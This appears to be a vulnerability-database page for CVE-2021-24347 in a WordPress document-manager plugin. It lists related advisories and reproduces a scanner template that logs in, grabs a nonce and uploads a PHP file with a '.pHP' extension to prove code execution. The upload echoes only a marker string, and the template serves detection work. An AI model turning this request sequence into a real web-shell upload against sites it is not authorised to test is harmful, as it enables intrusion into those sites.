| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Wordpress SP Project & Document Manager 4.21 Plugin - Remote Code Execution Exploit | 8 Jul 202100:00 | – | zdt | |
| WordPress SP Project And Document Remote Code Execution Exploit | 26 Jul 202100:00 | – | zdt | |
| CVE-2021-24347 | 10 Jul 202116:29 | – | circl | |
| WordPress 代码注入漏洞 | 14 Jun 202100:00 | – | cnnvd | |
| p0wny Shell Remote Code Execution (CVE-2017-9830; CVE-2018-15139; CVE-2018-19423; CVE-2018-6383; CVE-2020-29607; CVE-2021-24155; CVE-2021-24347) | 19 Oct 202100:00 | – | checkpoint_advisories | |
| CVE-2021-24347 | 14 Jun 202113:37 | – | cve | |
| CVE-2021-24347 SP Project & Document Manager <2 4.22 - Authenticated Shell Upload | 14 Jun 202113:37 | – | cvelist | |
| Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated) | 8 Jul 202100:00 | – | exploitdb | |
| Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution | 24 Jul 202117:50 | – | metasploit | |
| CVE-2021-24347 | 14 Jun 202114:15 | – | nvd |
id: CVE-2021-24347
info:
name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
author: theamanrawat
severity: high
description: |
WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
impact: |
Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site.
remediation: Fixed in version 4.22.
reference:
- https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
- https://wordpress.org/plugins/sp-client-document-manager/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24347
- http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
- https://github.com/Hacker5preme/Exploits
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24347
cwe-id: CWE-178
epss-score: 0.52007
epss-percentile: 0.98823
cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: smartypantsplugins
product: sp_project_\&_document_manager
framework: wordpress
tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="cdm_upload_file_field"
{{nonce}}
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="_wp_http_referer"
/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-name"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
Content-Type: image/svg+xml
<?php
echo "CVE-2021-24347";
?>
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="dlg-upload-notes"
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
Content-Disposition: form-data; name="sp-cdm-community-upload"
Upload
------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
- |
GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains(header_4, "text/html")
- status_code_4 == 200
- contains(body_4, "CVE-2021-24347")
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"
internal: true
# digest: 490a00463044022027ac9a0d4aeb61b4c9f6944a5bac89d2bcbfa04a320aed2c1e7352425d55a2e002205e7b57adca94bf694dd88e3e5bee76473217ec6ca03f962d1eef5c506e53c268:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation